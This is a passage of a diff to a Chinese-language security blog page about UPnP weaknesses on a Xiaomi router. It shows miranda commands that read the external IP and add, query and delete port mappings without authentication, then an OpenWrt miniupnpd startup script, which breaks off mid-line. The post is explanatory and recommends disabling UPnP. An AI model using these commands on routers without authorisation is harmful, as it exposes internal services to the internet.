WAN Device</span><br><span class="line">          	UPC: 000000000000</span><br><span class="line">          	modelNumber: 20180830</span><br><span class="line">          	friendlyName: WANDevice</span><br><span class="line">          	fullName: urn:schemas-upnp-org:device:WANDevice:1</span><br><span class="line">          	modelDescription: WAN Device</span><br><span class="line">          	UDN: uuid:f3539dd5-8dc5-420c-9070-c6f66d27fc8d</span><br><span class="line">          	modelURL: http://miniupnp.free.fr/</span><br><span class="line">          	manufacturer: MiniUPnP</span><br><span class="line">          WANConnectionDevice</span><br><span class="line">          	manufacturerURL: http://miniupnp.free.fr/</span><br><span class="line">          	modelName: MiniUPnPd</span><br><span class="line">          	UPC: 000000000000</span><br><span class="line">          	modelNumber: 20180830</span><br><span class="line">          	friendlyName: WANConnectionDevice</span><br><span class="line">          	fullName: urn:schemas-upnp-org:device:WANConnectionDevice:1</span><br><span class="line">          	modelDescription: MiniUPnP daemon</span><br><span class="line">          	UDN: uuid:f3539dd5-8dc5-420c-9070-c6f66d27fc8e</span><br><span class="line">          	modelURL: http://miniupnp.free.fr/</span><br><span class="line">          	manufacturer: MiniUPnP</span><br></pre></td></tr></table></figure>
 <ul>
 <li>使用miranda发送UPnP命令<br><strong>获取外部IP地址</strong></li>
 </ul>
-<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">upnp</span>&gt; <span class="selector-tag">host</span> <span class="selector-tag">send</span> 0 <span class="selector-tag">WANConnectionDevice</span> <span class="selector-tag">WANIPConnection</span> <span class="selector-tag">GetExternalIPAddress</span></span><br><span class="line"></span><br><span class="line"><span class="selector-tag">NewExternalIPAddress</span> : 172<span class="selector-class">.16</span><span class="selector-class">.173</span><span class="selector-class">.231</span></span><br></pre></td></tr></table></figure>
+<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send 0 WANConnectionDevice WANIPConnection GetExternalIPAddress</span><br><span class="line"></span><br><span class="line">NewExternalIPAddress : 172.16.173.231</span><br></pre></td></tr></table></figure>
 <p><strong>增加一个端口映射，将路由器上端口为1900的服务映射到外网端口8080</strong></p>
-<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send <span class="number">0</span> WANConnectionDevice WANIPConnection AddPortMapping</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">	Argument Name:  NewPortMappingDescription</span><br><span class="line">	Data Type:      string</span><br><span class="line">	Allowed Values: []</span><br><span class="line">	<span class="keyword">Set</span> NewPortMappingDescription <span class="comment">value to: HACK</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">	Argument <span class="comment">Name:  NewLeaseDuration</span></span><br><span class="line">	Data <span class="comment">Type:      ui4</span></span><br><span class="line">	Allowed <span class="comment">Values: []</span></span><br><span class="line">	Value <span class="comment">Min:      0</span></span><br><span class="line">	Value <span class="comment">Max:      604800</span></span><br><span class="line">	<span class="keyword">Set</span> <span class="comment">NewLeaseDuration value to: 0</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">	Argument <span class="comment">Name:  NewInternalClient</span></span><br><span class="line">	Data <span class="comment">Type:      string</span></span><br><span class="line">	Allowed <span class="comment">Values: []</span></span><br><span class="line">	<span class="keyword">Set</span> <span class="comment">NewInternalClient value to: 192.168.31.1</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">	Argument <span class="comment">Name:  NewEnabled</span></span><br><span class="line">	Data <span class="comment">Type:      boolean</span></span><br><span class="line">	Allowed <span class="comment">Values: []</span></span><br><span class="line">	<span class="keyword">Set</span> <span class="comment">NewEnabled value to: 1</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">	Argument <span class="comment">Name:  NewExternalPort</span></span><br><span class="line">	Data <span class="comment">Type:      ui2</span></span><br><span class="line">	Allowed <span class="comment">Values: []</span></span><br><span class="line">	<span class="keyword">Set</span> <span class="comment">NewExternalPort value to: 8080</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">	Argument <span class="comment">Name:  NewRemoteHost</span></span><br><span class="line">	Data <span class="comment">Type:      string</span></span><br><span class="line">	Allowed <span class="comment">Values: []</span></span><br><span class="line">	<span class="keyword">Set</span> <span class="comment">NewRemoteHost value to:</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">	Argument <span class="comment">Name:  NewProtocol</span></span><br><span class="line">	Data <span class="comment">Type:      string</span></span><br><span class="line">	Allowed <span class="comment">Values: [</span><span class="comment">'TCP'</span><span class="comment">,</span> <span class="comment">'UDP'</span><span class="comment">]</span></span><br><span class="line">	<span class="keyword">Set</span> <span class="comment">NewProtocol value to: TCP</span></span><br><span class="line"></span><br><span class="line">Required <span class="comment">argument:</span></span><br><span class="line">	Argument <span class="comment">Name:  NewInternalPort</span></span><br><span class="line">	Data <span class="comment">Type:      ui2</span></span><br><span class="line">	Allowed <span class="comment">Values: []</span></span><br><span class="line">	Value <span class="comment">Min:      1</span></span><br><span class="line">	Value <span class="comment">Max:      65535</span></span><br><span class="line">	<span class="keyword">Set</span> <span class="comment">NewInternalPort value to: 1900</span></span><br></pre></td></tr></table></figure>
-<figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send <span class="number">0</span> WANConnectionDevice WANIPConnection GetSpecificPortMappingEntry</span><br><span class="line"></span><br><span class="line">  Required <span class="string">argument:</span></span><br><span class="line">  	Argument <span class="string">Name:</span>  NewExternalPort</span><br><span class="line">  	Data <span class="string">Type:</span>      ui2</span><br><span class="line">  	Allowed <span class="string">Values:</span> []</span><br><span class="line">  	Set NewExternalPort value <span class="string">to:</span> <span class="number">8080</span></span><br><span class="line"></span><br><span class="line">  Required <span class="string">argument:</span></span><br><span class="line">  	Argument <span class="string">Name:</span>  NewRemoteHost</span><br><span class="line">  	Data <span class="string">Type:</span>      string</span><br><span class="line">  	Allowed <span class="string">Values:</span> []</span><br><span class="line">  	Set NewRemoteHost value <span class="string">to:</span></span><br><span class="line"></span><br><span class="line">  Required <span class="string">argument:</span></span><br><span class="line">  	Argument <span class="string">Name:</span>  NewProtocol</span><br><span class="line">  	Data <span class="string">Type:</span>      string</span><br><span class="line">  	Allowed <span class="string">Values:</span> [<span class="string">'TCP'</span>, <span class="string">'UDP'</span>]</span><br><span class="line">  	Set NewProtocol value <span class="string">to:</span> TCP</span><br><span class="line"></span><br><span class="line">  <span class="string">NewPortMappingDescription :</span> HACK</span><br><span class="line">  <span class="string">NewLeaseDuration :</span> <span class="number">0</span></span><br><span class="line">  <span class="string">NewInternalClient :</span> <span class="number">192.168</span><span class="number">.31</span><span class="number">.1</span></span><br><span class="line">  <span class="string">NewEnabled :</span> <span class="number">1</span></span><br><span class="line">  <span class="string">NewInternalPort :</span> <span class="number">1900</span></span><br></pre></td></tr></table></figure>
-<p><strong>可以无需验证地删除映射</strong><br><figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host <span class="built_in">send</span> <span class="number">0</span> WANConnectionDevice WANIPConnection DeletePortMapping</span><br></pre></td></tr></table></figure></p>
+<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send 0 WANConnectionDevice WANIPConnection AddPortMapping</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">	Argument Name:  NewPortMappingDescription</span><br><span class="line">	Data Type:      string</span><br><span class="line">	Allowed Values: []</span><br><span class="line">	Set NewPortMappingDescription value to: HACK</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">	Argument Name:  NewLeaseDuration</span><br><span class="line">	Data Type:      ui4</span><br><span class="line">	Allowed Values: []</span><br><span class="line">	Value Min:      0</span><br><span class="line">	Value Max:      604800</span><br><span class="line">	Set NewLeaseDuration value to: 0</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">	Argument Name:  NewInternalClient</span><br><span class="line">	Data Type:      string</span><br><span class="line">	Allowed Values: []</span><br><span class="line">	Set NewInternalClient value to: 192.168.31.1</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">	Argument Name:  NewEnabled</span><br><span class="line">	Data Type:      boolean</span><br><span class="line">	Allowed Values: []</span><br><span class="line">	Set NewEnabled value to: 1</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">	Argument Name:  NewExternalPort</span><br><span class="line">	Data Type:      ui2</span><br><span class="line">	Allowed Values: []</span><br><span class="line">	Set NewExternalPort value to: 8080</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">	Argument Name:  NewRemoteHost</span><br><span class="line">	Data Type:      string</span><br><span class="line">	Allowed Values: []</span><br><span class="line">	Set NewRemoteHost value to:</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">	Argument Name:  NewProtocol</span><br><span class="line">	Data Type:      string</span><br><span class="line">	Allowed Values: [&apos;TCP&apos;, &apos;UDP&apos;]</span><br><span class="line">	Set NewProtocol value to: TCP</span><br><span class="line"></span><br><span class="line">Required argument:</span><br><span class="line">	Argument Name:  NewInternalPort</span><br><span class="line">	Data Type:      ui2</span><br><span class="line">	Allowed Values: []</span><br><span class="line">	Value Min:      1</span><br><span class="line">	Value Max:      65535</span><br><span class="line">	Set NewInternalPort value to: 1900</span><br></pre></td></tr></table></figure>
+<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send 0 WANConnectionDevice WANIPConnection GetSpecificPortMappingEntry</span><br><span class="line"></span><br><span class="line">  Required argument:</span><br><span class="line">  	Argument Name:  NewExternalPort</span><br><span class="line">  	Data Type:      ui2</span><br><span class="line">  	Allowed Values: []</span><br><span class="line">  	Set NewExternalPort value to: 8080</span><br><span class="line"></span><br><span class="line">  Required argument:</span><br><span class="line">  	Argument Name:  NewRemoteHost</span><br><span class="line">  	Data Type:      string</span><br><span class="line">  	Allowed Values: []</span><br><span class="line">  	Set NewRemoteHost value to:</span><br><span class="line"></span><br><span class="line">  Required argument:</span><br><span class="line">  	Argument Name:  NewProtocol</span><br><span class="line">  	Data Type:      string</span><br><span class="line">  	Allowed Values: [&apos;TCP&apos;, &apos;UDP&apos;]</span><br><span class="line">  	Set NewProtocol value to: TCP</span><br><span class="line"></span><br><span class="line">  NewPortMappingDescription : HACK</span><br><span class="line">  NewLeaseDuration : 0</span><br><span class="line">  NewInternalClient : 192.168.31.1</span><br><span class="line">  NewEnabled : 1</span><br><span class="line">  NewInternalPort : 1900</span><br></pre></td></tr></table></figure>
+<p><strong>可以无需验证地删除映射</strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upnp&gt; host send 0 WANConnectionDevice WANIPConnection DeletePortMapping</span><br></pre></td></tr></table></figure></p>
 <p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1555918880/paper/2231.png" alt><br>虽然UPnP是一种很少理解的协议，但它在绝大多数家庭网络上都很活跃，甚至在某些公司网络上也是如此。许多设备支持UPnP以便于消费者使用，但是，它们通常支持不允许任何服务自动执行的操作，尤其是未经授权的情况下。更糟糕的是，协议实现本身很少以安全思维构建，使其可以进一步利用。<br>防止本地/远程利用UPnP的最佳方法是在任何/所有网络设备上禁用该功能。然而，考虑到这个协议和其他“自动魔术”协议旨在帮助懒惰的用户，他们可能不知道这些协议的危险，唯一真正的解决方案是让供应商更加关注他们的设计和实施，并且更加安全。</p>
 <h2 id="浏览配置文件"><a href="#浏览配置文件" class="headerlink" title="浏览配置文件"></a>浏览配置文件</h2><h3 id="通过find命令搜索"><a href="#通过find命令搜索" class="headerlink" title="通过find命令搜索"></a>通过find命令搜索</h3><pre>root@XiaoQiang:/# find -name *upnp*
 ./etc/rc.d/S95miniupnpd
@@ -625,7 +626,7 @@
 <ul>
 <li>/etc/rc.d 启动的配置文件和脚本</li>
 </ul>
-<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br></pre></td><td class="code"><pre><span class="line">!/bin/sh /etc/rc.common</span><br><span class="line"><span class="comment"># Copyright (C) 2006-2011 OpenWrt.org</span></span><br><span class="line"></span><br><span class="line">START=95</span><br><span class="line">SERVICE_USE_PID=1</span><br><span class="line"><span class="function"><span class="title">upnpd_get_port_range</span></span>() &#123;</span><br><span class="line">        <span class="built_in">local</span> _var=<span class="string">"<span class="variable">$1</span>"</span>; <span class="built_in">shift</span></span><br><span class="line">        <span class="built_in">local</span> _val</span><br><span class="line">        config_get _val <span class="string">"<span class="variable">$@</span>"</span></span><br><span class="line">        <span class="keyword">case</span> <span class="string">"<span class="variable">$_val</span>"</span> <span class="keyword">in</span></span><br><span class="line">                [0-9]*[:-][0-9]*)</span><br><span class="line">                        <span class="built_in">export</span> -n -- <span class="string">"<span class="variable">$&#123;_var&#125;</span>_start=<span class="variable">$&#123;_val%%[:-]*&#125;</span>"</span></span><br><span class="line">                        <span class="built_in">export</span> -n -- <span class="string">"<span class="variable">$&#123;_var&#125;</span>_end=<span class="variable">$&#123;_val##*[:-]&#125;</span>"</span></span><br><span class="line">                ;;</span><br><span class="line">                [0-9]*)</span><br><span class="line">                        <span class="built_in">export</span> -n -- <span class="string">"<span class="variable">$&#123;_var&#125;</span>_start=<span class="variable">$_val</span>"</span></span><br><span class="line">                        <span class="built_in">export</span> -n -- <span class="string">"<span class="variable">$&#123;_var&#125;</span>_end="</span></span><br><span class="line">                ;;</span><br><span class="line">        <span class="keyword">esac</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="title">conf_rule_add</span></span>() &#123;</span><br><span class="line">        <span class="built_in">local</span> cfg=<span class="string">"<span class="variable">$1</span>"</span></span><br><span class="line">        <span class="built_in">local</span> tmpconf=<span class="string">"<span class="variable">$2</span>"</span></span><br><span class="line">        <span class="built_in">local</span> action external_port_start external_port_end int_addr</span><br><span class="line">        <span class="built_in">local</span> internal_port_start internal_port_end</span><br><span class="line"></span><br><span class="line">        config_get action <span class="string">"<span class="variable">$cfg</span>"</span> action <span class="string">"deny"</span>               <span class="comment"># allow or deny</span></span><br><span class="line">        upnpd_get_port_range <span class="string">"ext"</span> <span class="string">"<span class="variable">$cfg</span>"</span> ext_ports <span class="string">"0-65535"</span> <span class="comment"># external ports: x, x-y, x:y</span></span><br><span class="line">        config_get int_addr <span class="string">"<span class="variable">$cfg</span>"</span> int_addr <span class="string">"0.0.0.0/0"</span>       <span class="comment"># ip or network and subnet mask (internal)</span></span><br><span class="line">        upnpd_get_port_range <span class="string">"int"</span> <span class="string">"<span class="variable">$cfg</span>"</span> int_ports <span class="string">"0-65535"</span> <span class="comment"># internal ports: x, x-y, x:y or range</span></span><br><span class="line"></span><br><span class="line">        <span class="comment"># Make a single IP IP/32 so that miniupnpd.conf can use it.</span></span><br><span class="line">        <span class="keyword">case</span> <span class="string">"<span class="variable">$int_addr</span>"</span> <span class="keyword">in</span></span><br><span class="line">                */*) ;;</span><br><span class="line">                *) int_addr=<span class="string">"<span class="variable">$int_addr</span>/32"</span> ;;</span><br><span class="line">        <span class="keyword">esac</span></span><br><span class="line"></span><br><span class="line">        <span class="built_in">echo</span> <span class="string">"<span class="variable">$&#123;action&#125;</span> <span class="variable">$&#123;ext_start&#125;</span><span class="variable">$&#123;ext_end:+-&#125;</span><span class="variable">$&#123;ext_end&#125;</span> <span class="variable">$&#123;int_addr&#125;</span> <span class="variable">$&#123;int_start&#125;</span><span class="variable">$&#123;int_end:+-&#125;</span><span class="variable">$&#123;int_end&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="title">upnpd_write_bool</span></span>() &#123;                                                                                                   </span><br><span class="line">        <span class="built_in">local</span> opt=<span class="string">"<span class="variable">$1</span>"</span>                                                                                                 </span><br><span class="line">        <span class="built_in">local</span> def=<span class="string">"<span class="variable">$&#123;2:-0&#125;</span>"</span>                                                                                            </span><br><span class="line">        <span class="built_in">local</span> alt=<span class="string">"<span class="variable">$3</span>"</span>                                                                                                 </span><br><span class="line">        <span class="built_in">local</span> val                                                                                                      </span><br><span class="line"></span><br><span class="line">        config_get_bool val config <span class="string">"<span class="variable">$opt</span>"</span> <span class="string">"<span class="variable">$def</span>"</span>                                                                       </span><br><span class="line">        <span class="keyword">if</span> [ <span class="string">"<span class="variable">$val</span>"</span> -eq 0 ]; <span class="keyword">then</span>                                                                                      </span><br><span class="line">                <span class="built_in">echo</span> <span class="string">"<span class="variable">$&#123;alt:-$opt&#125;</span>=no"</span> &gt;&gt; <span class="variable">$tmpconf</span>                                                                     </span><br><span class="line">        <span class="keyword">else</span>                                                                                                           </span><br><span class="line">                <span class="built_in">echo</span> <span class="string">"<span class="variable">$&#123;alt:-$opt&#125;</span>=yes"</span> &gt;&gt; <span class="variable">$tmpconf</span>                                                                    </span><br><span class="line">        <span class="keyword">fi</span>                                                                                                             </span><br><span class="line">&#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="title">boot</span></span>() &#123;                                                                                                               </span><br><span class="line">        <span class="built_in">return</span> 0                                                                                                       </span><br><span class="line">&#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="title">start</span></span>() &#123;                                                                                                              </span><br><span class="line">        config_load <span class="string">"upnpd"</span>                                                                                            </span><br><span class="line">        <span class="built_in">local</span> extiface intiface upload download logging secure enabled natpmp                                          </span><br><span class="line">        <span class="built_in">local</span> extip port usesysuptime conffile serial_number model_number                                              </span><br><span class="line">        <span class="built_in">local</span> uuid notify_interval presentation_url enable_upnp                                                        </span><br><span class="line">        <span class="built_in">local</span> upnp_lease_file clean_ruleset_threshold clean_ruleset_interval                                           </span><br><span class="line"></span><br><span class="line">        config_get extiface config external_iface                                                                      </span><br><span class="line">        config_get intiface config internal_iface                                                                      </span><br><span class="line">        config_get extip config external_ip                                                                            </span><br><span class="line">        config_get port config port 5000                                                                               </span><br><span class="line">        config_get upload   config upload                                                                              </span><br><span class="line">        config_get download config download                                                                            </span><br><span class="line">        config_get_bool logging config log_output 0                                                                    </span><br><span class="line">        config_get conffile config config_file                                                                         </span><br><span class="line">        config_get serial_number config serial_number                                                                  </span><br><span class="line">        config_get model_number config model_number                                                                    </span><br><span class="line">        config_get uuid config uuid                                                                                    </span><br><span class="line">        config_get notify_interval config notify_interval                                                              </span><br><span class="line">        config_get presentation_url config presentation_url                                                            </span><br><span class="line">        config_get upnp_lease_file config upnp_lease_file                                                              </span><br><span class="line">        config_get clean_ruleset_threshold config clean_ruleset_threshold                                              </span><br><span class="line">        config_get clean_ruleset_interval config clean_ruleset_interval                                                </span><br><span class="line"></span><br><span class="line">        <span class="built_in">local</span> args                                                                                                     </span><br><span class="line"></span><br><span class="line">        . /lib/<span class="built_in">functions</span>/network.sh        </span><br><span class="line">        <span class="built_in">local</span> ifname                                                                                                   </span><br><span class="line">        network_get_device ifname <span class="variable">$&#123;extiface:-wan&#125;</span>                                                                     </span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> [ -n <span class="string">"<span class="variable">$conffile</span>"</span> ]; <span class="keyword">then</span>                                                                                    </span><br><span class="line">                args=<span class="string">"-f <span class="variable">$conffile</span>"</span>                                                                                    </span><br><span class="line">        <span class="keyword">else</span>                                                                                                           </span><br><span class="line">                <span class="built_in">local</span> tmpconf=<span class="string">"/var/etc/miniupnpd.conf"</span>                                                                </span><br><span class="line">                args=<span class="string">"-f <span class="variable">$tmpconf</span>"</span>                                                                                     </span><br><span class="line">                mkdir -p /var/etc                                                                                      </span><br><span class="line"></span><br><span class="line">                <span class="built_in">echo</span> <span class="string">"ext_ifname=<span class="variable">$ifname</span>"</span> &gt;<span class="variable">$tmpconf</span>                                                                    </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$extip</span>"</span> ] &amp;&amp; \                                                                                   </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"ext_ip=<span class="variable">$extip</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                                </span><br><span class="line"></span><br><span class="line">                <span class="built_in">local</span> iface                                                                                            </span><br><span class="line">                <span class="keyword">for</span> iface <span class="keyword">in</span> <span class="variable">$&#123;intiface:-lan&#125;</span>; <span class="keyword">do</span>                                                                      </span><br><span class="line">                        <span class="built_in">local</span> device                                                                                   </span><br><span class="line">                        network_get_device device <span class="string">"<span class="variable">$iface</span>"</span> &amp;&amp; &#123;                                                        </span><br><span class="line">                                <span class="built_in">echo</span> <span class="string">"listening_ip=<span class="variable">$device</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                 </span><br><span class="line">                        &#125;                                                                                              </span><br><span class="line">                <span class="keyword">done</span>                                                                                                   </span><br><span class="line"></span><br><span class="line">                [ <span class="string">"<span class="variable">$port</span>"</span> != <span class="string">"auto"</span> ] &amp;&amp; \                                                                             </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"port=<span class="variable">$port</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                                   </span><br><span class="line"></span><br><span class="line">                config_load <span class="string">"upnpd"</span>                                                                                    </span><br><span class="line">                upnpd_write_bool enable_natpmp 1                             </span><br><span class="line">                upnpd_write_bool enable_upnp 1                               </span><br><span class="line">                upnpd_write_bool secure_mode 1                               </span><br><span class="line">                upnpd_write_bool system_uptime 1    </span><br><span class="line">                [ -n <span class="string">"<span class="variable">$upnp_lease_file</span>"</span> ] &amp;&amp; &#123;                                                                         </span><br><span class="line">                        touch <span class="variable">$upnp_lease_file</span>                                                                         </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"lease_file=<span class="variable">$upnp_lease_file</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                  </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$upload</span>"</span> -a -n <span class="string">"<span class="variable">$download</span>"</span> ] &amp;&amp; &#123;                                                                </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"bitrate_down=<span class="variable">$(($download * 1024 * 8)</span>)"</span> 